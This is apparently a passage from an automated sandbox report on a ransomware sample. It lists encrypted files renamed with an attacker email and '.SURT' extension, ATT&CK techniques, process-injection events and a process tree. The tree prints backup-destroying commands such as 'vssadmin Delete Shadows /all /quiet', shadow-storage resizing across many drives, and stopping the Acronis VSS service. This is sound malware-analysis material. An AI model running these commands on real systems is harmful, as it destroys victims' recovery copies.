File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_OEM_Perp-ul-phn.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ppd.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyReport.dotx.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\STSCOPY.DLL.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\zh-phonetic.xml.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl\PresentationCore.resources.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\javafx\libxslt.md.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filterselected-disabled_32.svg.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_hu.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\msvcp140.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\COMPASS.ELM.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\7-Zip\Lang\is.txt.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTrial-ul-oob.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\System.Design.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\bin\plugin2\npjp2.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-ppd.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.ELM.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libwave_plugin.dll.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\OutlookVL_MAK-ppd.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Grace-ppd.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\redshift.ini.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\exportpdf-rna-selector.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\be_get.svg.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\plugin.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\ui-strings.js.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Trial-ul-oob.xrm-ms.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\Windows Media Player\ja-JP\mpvis.dll.mui.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons_retina.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png.[[email protected]].SURT	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe

Interacts with shadow copies 3 TTPs 27 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
1088	vssadmin.exe
4632	vssadmin.exe
1488	vssadmin.exe
2084	vssadmin.exe
5104	vssadmin.exe
2928	vssadmin.exe
3916	vssadmin.exe
3820	vssadmin.exe
4684	vssadmin.exe
4928	vssadmin.exe
1728	vssadmin.exe
1940	vssadmin.exe
4804	vssadmin.exe
4372	vssadmin.exe
3016	vssadmin.exe
1872	vssadmin.exe
5152	vssadmin.exe
3556	vssadmin.exe
3076	vssadmin.exe
848	vssadmin.exe
5168	vssadmin.exe
3168	vssadmin.exe
4292	vssadmin.exe
3184	vssadmin.exe
4932	vssadmin.exe
5144	vssadmin.exe
4072	vssadmin.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4484	schtasks.exe
1488	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeBackupPrivilege	5036	vssvc.exe
Token: SeRestorePrivilege	5036	vssvc.exe
Token: SeAuditPrivilege	5036	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2720 wrote to memory of 2844	2720	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	84
PID 2720 wrote to memory of 2844	2720	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	84
PID 2720 wrote to memory of 2844	2720	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	84
PID 2720 wrote to memory of 2844	2720	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	84
PID 2720 wrote to memory of 2844	2720	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	84
PID 2720 wrote to memory of 2844	2720	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	84
PID 2720 wrote to memory of 2844	2720	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	84
PID 2844 wrote to memory of 2756	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	85
PID 2844 wrote to memory of 2756	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	85
PID 2844 wrote to memory of 2692	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	86
PID 2844 wrote to memory of 2692	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	86
PID 2844 wrote to memory of 3968	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	87
PID 2844 wrote to memory of 3968	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	87
PID 3968 wrote to memory of 3460	3968	cmd.exe	88
PID 3968 wrote to memory of 3460	3968	cmd.exe	88
PID 2844 wrote to memory of 5072	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	89
PID 2844 wrote to memory of 5072	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	89
PID 2844 wrote to memory of 4108	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	90
PID 2844 wrote to memory of 4108	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	90
PID 2844 wrote to memory of 3112	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	91
PID 2844 wrote to memory of 3112	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	91
PID 2844 wrote to memory of 1752	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	92
PID 2844 wrote to memory of 1752	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	92
PID 2844 wrote to memory of 4956	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	93
PID 2844 wrote to memory of 4956	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	93
PID 2844 wrote to memory of 2796	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	94
PID 2844 wrote to memory of 2796	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	94
PID 2844 wrote to memory of 4140	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	95
PID 2844 wrote to memory of 4140	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	95
PID 2844 wrote to memory of 2144	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	96
PID 2844 wrote to memory of 2144	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	96
PID 2844 wrote to memory of 3064	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	97
PID 2844 wrote to memory of 3064	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	97
PID 2844 wrote to memory of 1492	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	98
PID 2844 wrote to memory of 1492	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	98
PID 2844 wrote to memory of 1444	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	99
PID 2844 wrote to memory of 1444	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	99
PID 2844 wrote to memory of 3760	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	100
PID 2844 wrote to memory of 3760	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	100
PID 2844 wrote to memory of 4736	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	101
PID 2844 wrote to memory of 4736	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	101
PID 2844 wrote to memory of 2456	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	102
PID 2844 wrote to memory of 2456	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	102
PID 2844 wrote to memory of 2164	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	103
PID 2844 wrote to memory of 2164	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	103
PID 2844 wrote to memory of 4768	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	104
PID 2844 wrote to memory of 4768	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	104
PID 2844 wrote to memory of 2360	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	105
PID 2844 wrote to memory of 2360	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	105
PID 2844 wrote to memory of 1652	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	106
PID 2844 wrote to memory of 1652	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	106
PID 2844 wrote to memory of 1660	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	107
PID 2844 wrote to memory of 1660	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	107
PID 2844 wrote to memory of 2224	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	108
PID 2844 wrote to memory of 2224	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	108
PID 2844 wrote to memory of 4264	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	109
PID 2844 wrote to memory of 4264	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	109
PID 2844 wrote to memory of 1936	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	110
PID 2844 wrote to memory of 1936	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	110
PID 2844 wrote to memory of 4240	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	111
PID 2844 wrote to memory of 4240	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	111
PID 2844 wrote to memory of 2724	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	112
PID 2844 wrote to memory of 2724	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	112
PID 2844 wrote to memory of 3148	2844	8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe	113

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3184	attrib.exe
3016	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
"C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2720
- C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe
  "C:\Users\Admin\AppData\Local\Temp\8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980.exe"
  2⤵
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
    3⤵
    PID:2756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo off
    3⤵
    PID:2692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c chcp 437
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3968
  - - C:\Windows\system32\chcp.com
      chcp 437
      4⤵
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
    3⤵
    PID:5072
  - - C:\Windows\system32\net.exe
      net stop "Acronis VSS Provider"
      4⤵
      PID:4432
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Acronis VSS Provider"
        5⤵
        
        PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
    3⤵
    PID:4108
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
      4⤵
      PID:4052
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:5152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    PID:3112
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
      4⤵
      PID:4996
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:4372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    PID:1752
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      4⤵
      PID:3920
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    PID:4956
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
      4⤵
      PID:4924
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    PID:2796
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
      4⤵
      PID:5032
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    PID:4140
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
      4⤵
      PID:4500
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    PID:2144
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
      4⤵
      PID:4368
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    PID:3064
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
      4⤵
      PID:1372
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    3⤵
    PID:1492
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
      4⤵
      PID:4496
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    PID:1444
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
      4⤵
      PID:1548
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    PID:3760
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
      4⤵
      PID:2900
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    PID:4736
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
      4⤵
      PID:4332
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:3168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    PID:2456
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
      4⤵
      PID:3608
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    PID:2164
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
      4⤵
      PID:2992
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    PID:4768
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
      4⤵
      PID:1428
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
